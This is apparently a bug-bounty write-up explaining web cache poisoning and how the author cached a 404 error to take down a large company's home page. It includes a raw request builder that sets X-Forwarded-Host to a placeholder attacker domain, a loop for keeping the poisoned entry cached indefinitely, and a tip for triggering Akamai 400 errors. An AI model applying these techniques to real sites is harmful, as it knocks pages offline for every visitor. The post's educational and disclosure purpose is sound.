Today I’m going to talk about caches, denial of service, and a vulnerability I recently found in a very large company.
Hello hunters, let’s take a closer look at how cache poisoning works and how I was able to exploit this vulnerability to cause a DoS on the home page of a large company.
A cache is an intermediate memory system used to temporarily store data in order to optimize rendering performance when browsing a website.
There are several caching systems: the browser (client-side) cache, intermediate caches such as proxies and CDNs, and server-side caches.
You will surely have understood that the caching system that interests us here is the server-side one. If we assume that:
- the cache provides an identical response to users who have made a similar request
- cached responses are stored for a limited time
What happens if a malicious version of the site gets saved in the cache, and this version is then served to users who visit the site after us?
Definition from PortSwigger: Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
A successful web cache poisoning attack can lead to several types of attack depending on the nature of the payload stored in the cache by the attacker: HTMLi, XSS, open redirection, DoS, etc.
In order to exploit the behavior of the cache as an attacker, it is necessary to understand how it works. I said earlier that “the cache provides an identical response to users who made a similar request”, but how does the cache decide that a request is similar?
This is where “cache keys” come in: when the cache receives a request, it compares some of its components (request line, host, certain headers, etc.) with those of the requests whose responses it has already saved.
We can imagine that all of these components, called cache keys, form a kind of “fingerprint”. If this request “fingerprint” matches a stored one, the cache returns the corresponding response; otherwise, having no saved response for that request, it forwards the request to the web server.
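As a rough illustration of this “fingerprint” idea (not any particular vendor’s implementation), a cache key could be built by hashing only the keyed components of the request, so that unkeyed headers never affect the lookup:

```python
import hashlib

# Hypothetical configuration: only the Host header is keyed,
# along with the request line. Real caches differ.
KEYED_HEADERS = {"host"}

def cache_key(method: str, path: str, headers: dict) -> str:
    # Keep only the keyed headers, case-insensitively.
    keyed = {k.lower(): v for k, v in headers.items() if k.lower() in KEYED_HEADERS}
    material = method + " " + path + " " + repr(sorted(keyed.items()))
    return hashlib.sha256(material.encode()).hexdigest()

# Two requests differing only in an unkeyed header share the same key,
# so the cache would serve both clients the same stored response:
k1 = cache_key("GET", "/", {"Host": "www.example.com", "X-Forwarded-Host": "evil.example"})
k2 = cache_key("GET", "/", {"Host": "www.example.com"})
assert k1 == k2
```

Changing the path or the Host, on the other hand, produces a different key and therefore a cache miss.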
The components of the request that are not included in the cache key are called “unkeyed”: the cache does not take them into consideration during the comparison. This is very interesting for an attacker: if one of these unkeyed components (any header, for example) is reflected in the response in a dangerous way (HTMLi, XSS, DoS, etc.), the attacker can get a harmful response stored and then served to every user who hits the same cache key.
This results in cache poisoning.
Cache keys vary and depend on the configuration of the cache in question, sometimes only the request line and host are included, and all other components of the request are unkeyed. It is therefore essential — as an attacker — to go through a phase of analysis and understanding of the target cache in order to identify the cache keys, the caching duration, etc.
I had the opportunity to exploit some cache-related vulnerabilities on different programs, and I recently found, within a fairly short interval, two cache poisoning vulnerabilities leading to a DoS, one of which was on a very big company.
The first thing to do to identify this type of vulnerability is to analyze the server response:
Before going any further, I would quickly like to introduce an important concept to prevent some people from breaking sites in production.
Some request components are systematically included in the cache key, starting with the URL (except in specific cases):
-> If the cache stores the response from: https://www.example.com/
-> And a user requests: https://www.example.com/?test=test
Then the cache — when comparing the cache keys — will not find an identical version and will forward the request to the server (the URL/request line being part of the cache key).
And it is precisely this behavior that we will use as researchers in order to carry out tests without compromising the target: during our tests, we will always add a unique parameter (a “cache buster”) to the target URL, so that the cached version, potentially poisoned, is only reachable from the URL containing that parameter. This way we avoid harming the users of the platform in question and can carry out our tests quietly.
Performing the attack via a cache buster is obviously sufficient, and mandatory, for the proof of concept when writing the report.
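A cache buster is just a throwaway query parameter. A minimal helper could look like this (the parameter name and URL are placeholders of my own):

```python
import secrets
from urllib.parse import urlencode, urlparse, urlunparse, parse_qsl

def add_cache_buster(url: str, name: str = "mycachebuster") -> str:
    """Append a unique parameter so the poisoned copy is keyed to a
    URL that no regular user will ever request."""
    parts = urlparse(url)
    query = parse_qsl(parts.query)
    query.append((name, secrets.token_hex(4)))  # random value per test
    return urlunparse(parts._replace(query=urlencode(query)))

busted = add_cache_buster("https://www.example.com/")
print(busted)  # e.g. https://www.example.com/?mycachebuster=1a2b3c4d
```

Because the query string is part of the cache key, only requests carrying our exact parameter can ever receive the poisoned response.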
After analyzing the server response, I know that a cache system is in place and I can identify two headers that are part of the cache key:
- “Accept-Encoding”
- “x-wf-forwarded-proto”
I start by doing small tests to find interesting “unkeyed” headers (headers not part of the cache key) such as “X-Forwarded-For”, “X-Host”, “X-Forwarded-Scheme”, etc., but nothing conclusive.
I won’t go into the details of the different search methods for finding a “Cache Deception” vulnerability here (maybe in a future article), but nothing conclusive came out of my tests at this level either.
On the other hand, I know that the “X-Timer” header, present in the response, is often reflected if a value is specified in the request. This header is harmless for a classic HTMLi/XSS type attack because it is reflected in the response headers and not in the HTML code, so I tried to cause an error in the back-end, hoping that the error would be saved in the cache:
I open a second browser and then try to access the URL — containing my cache buster (?mycachebuster=zhero_):
DoS achieved! The main page is completely inaccessible.
A few comments:
This time the unkeyed header that helped me was “X-Forwarded-Host”. Any value in this header caused a 404 error that was stored in the cache, making the main page of a large company (of which you are surely a customer one way or another) completely inaccessible:
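For illustration, the poisoning step boils down to one normal GET with a single extra header, sent against a cache-busted URL. The host name and header value below are placeholders, not the real target:

```python
def build_poison_request(host: str, path: str) -> str:
    """Build the raw HTTP/1.1 request that primes the cache with a 404:
    any X-Forwarded-Host value the back-end cannot handle triggers the
    error, and the cache then stores that error response."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "X-Forwarded-Host: anything.attacker.example\r\n"
        "\r\n"
    )

raw = build_poison_request("www.example.com", "/?mycachebuster=zhero_")
print(raw)
```

One request is enough: every subsequent visitor matching the same cache key is served the stored 404 until the entry expires.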
Checking from another browser:
DoS successful! 💉
You will surely have understood that the same attack is possible without the cache buster. Even if caching is limited in time (longer or shorter depending on the configuration), it is very easy for an attacker to make the attack “permanent” with a small script that re-sends the “poisoned” request at regular intervals based on the caching duration.
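A minimal sketch of such a script (the send function and the timings are placeholders, not what I actually used):

```python
import time

def keep_poisoned(send_poison, cache_ttl_seconds: float, rounds: int):
    """Re-send the poisoning request slightly before each cache expiry
    so the malicious entry never falls out of the cache."""
    for _ in range(rounds):
        send_poison()
        # Re-poison a few seconds before the TTL runs out.
        time.sleep(max(cache_ttl_seconds - 5, 0))

# Example with a stub instead of a real HTTP call:
hits = []
keep_poisoned(lambda: hits.append("poisoned"), cache_ttl_seconds=5, rounds=3)
print(hits)  # ['poisoned', 'poisoned', 'poisoned']
```

In a real attack `rounds` would be unbounded and `send_poison` would replay the poisoning request from the previous section.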
If you find an “unkeyed” header that is unusable for XSS and the like, consider a DoS as a last resort: if you manage to cause an error in the back-end and get the response cached, then you have your vulnerability (provided, of course, that the DoS hits an interesting page and not a CSS file or other resource).
Little extra tip: I read in an article by the researcher bombon (H1 username) that with the Akamai CDN it is possible to cause a 400 error by adding an illegal header, e.g.:
\:
The caching of the error will then depend on the cache configuration.